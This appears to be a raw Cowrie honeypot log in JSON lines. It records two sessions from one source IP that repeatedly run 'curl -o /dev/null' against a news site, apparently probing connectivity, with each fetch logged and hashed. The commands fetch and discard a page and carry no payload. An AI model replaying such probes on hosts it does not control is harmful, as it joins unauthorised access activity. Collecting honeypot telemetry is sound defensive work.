{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.950583Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.951653Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.954999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.956199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.961225Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.981349Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.987891Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:09.996599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:09.997684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.002173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.003419Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.012191Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.046074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.047182Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.049235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.050220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.075125Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.081134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.090366Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.091578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.097001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.097955Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.107530Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.112268Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.130010Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.133382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.134431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.138144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.139547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.174687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.175827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.179365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.180192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.186853Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.204516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.214279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.215408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.218311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.219357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.223572Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.254792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.256025Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.262090Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.263579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.290091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.291350Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.300129Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.301174Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.327533Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.328707Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.334269Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.340574Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.341937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.368129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.369261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.372473Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.381700Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.382873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.405317Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.406323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.420018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.421184Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.439402Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.441640Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.442296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.460053Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.463754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.464784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.470420Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.476214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.477174Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.506540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.509876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.510626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.518973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.520125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.544291Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.550292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.551269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.557221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.558279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.562076Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.565853Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.587281Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.590329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.591407Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.594919Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.596129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.619345Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.631062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.632245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.634325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.635373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
